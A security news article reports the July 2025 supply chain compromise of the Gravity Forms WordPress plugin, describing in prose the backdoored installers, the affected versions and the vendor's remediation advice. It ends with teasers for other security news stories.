The popular WordPress plugin Gravity Forms suffered from a supply chain attack. As a result, installers from the official website were infected with a backdoor.
Gravity Forms is a premium plugin for creating contact, payment, and other online forms. According to official statistics, it is installed on approximately one million sites, some of which belong to well-known organizations such as Airbnb, Nike, ESPN, Unicef, and Google.
Experts from PatchStack warn that they have received reports of suspicious requests being generated by plugins downloaded from the official Gravity Forms website.
Upon examining the plugin, researchers confirmed that a malicious file (gravityforms/common.php) is indeed being downloaded from the manufacturer’s website. Closer inspection revealed that this file initiates a POST request to a suspicious domain at gravityapi[.]org/sites.
Further analysis revealed that the plugin collects a wealth of metadata from sites, including the URL, path to the admin panel, as well as data about themes, plugins, and PHP/WordPress versions. All the collected data is transmitted to the attackers.
The server’s response from the hackers contains malicious PHP code encoded in base64, which is saved as wp-includes/bookmark-canonical.php. This malware disguises itself as WordPress Content Management Tools and allows remote code execution without the need for authentication by utilizing functions such as handle_posts(), handle_media(), handle_widgets().
RocketGenius, the company developing Gravity Forms, was notified of the issue, after which a representative informed researchers that the malware had infiltrated only the plugin versions installed manually and through Composer.
Experts recommend that anyone who downloaded Gravity Forms on July 10-11, 2025, reinstall the plugin by obtaining a clean version. Additionally, administrators need to check their sites for signs of infection.
The representatives from RocketGenius have already published an incident analysis, confirming that only versions 2.9.11.1 and 2.9.12 of Gravity Forms, available for manual download from July 10 to July 11, 2025, were compromised. It is also noted that if users installed version 2.9.11 via Composer on any of the mentioned dates, they also received an infected copy of the plugin.
“The Gravity API service, which handles licensing, automatic updates, and the installation of add-ons initiated by Gravity Forms, has not been compromised. The attack did not affect the package updates managed by this service,” the developers stated.
According to the developer, the malicious code blocked update attempts, connected to an external server to receive additional payloads, and added an administrator account to the site, giving attackers full control over the compromised resource.
2025.02.03 — PyPI introduces a project archival system to combat malicious updates
The Python Package Index (PyPI) introduces a new project archival system: a project can now be archived to notify users that it's not expected to be updated…
Full article →
2025.02.08 — Hackers exploit RCE vulnerability in Microsoft Outlook
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned Federal Civilian Executive Branch (FCEB) Agencies that they have to secure their systems from ongoing…
Full article →
2025.04.12 — Hackers compromised a bureau within the U.S. Department of the Treasury and spent months in hacked systems
The Office of the Comptroller of the Currency (OCC), an independent bureau within the United States Department of the Treasury, reported a major cybersecurity incident. Unknown attackers had…
Full article →
2025.02.28 — Qualcomm extends support for Android devices to 8 years
Qualcomm Technologies announced its collaboration with Google with the purpose to provide extended support for OEM devices running on company's flagship chipsets. This partnership will…
Full article →
2025.04.30 — Coinbase fixes 2FA bug that made customers panic
Cryptocurrency exchange Coinbase has fixed a bug in its Account Activity logs that caused customers to think their credentials were compromised. Earlier this month, BleepingComputer…
Full article →
2025.03.20 — 8,000 vulnerabilities identified in WordPress ecosystem in 2024
According to Patchstack, world's #1 WordPress vulnerability intelligence provider, 7,966 new vulnerabilities were identified in the WordPress ecosystem in 2024; most of these bugs affected plugins…
Full article →
2025.03.16 — Researchers force DeepSeek to write malware
According to Tenable, the AI chatbot DeepSeek R1 from China can be used to write malware (e.g. keyloggers and ransomware). DeepSeek was released in January 2025 and caused a stir…
Full article →
2025.02.20 — Newly-discovered vulnerabilities in OpenSSH open the door to MiTM and DoS attacks
OpenSSH fixed two vulnerabilities that could result in MiTM and denial of service (DoS) attacks. Interestingly, one of these bugs appeared in the code more than 10…
Full article →
2025.04.16 — Android devices will restart every three days to protect user data
Google introduces a new security feature for Android devices: locked and unused devices will be automatically restarted after three days of inactivity to return their memory to an…
Full article →
2025.02.12 — 2.8 million IP addresses used to brute-force network devices
The Shadowserver Foundation warns of a massive web login brute-forcing attacks targeting nearly 2.8 million IP addresses per day. Unknown attackers are seeking…
Full article →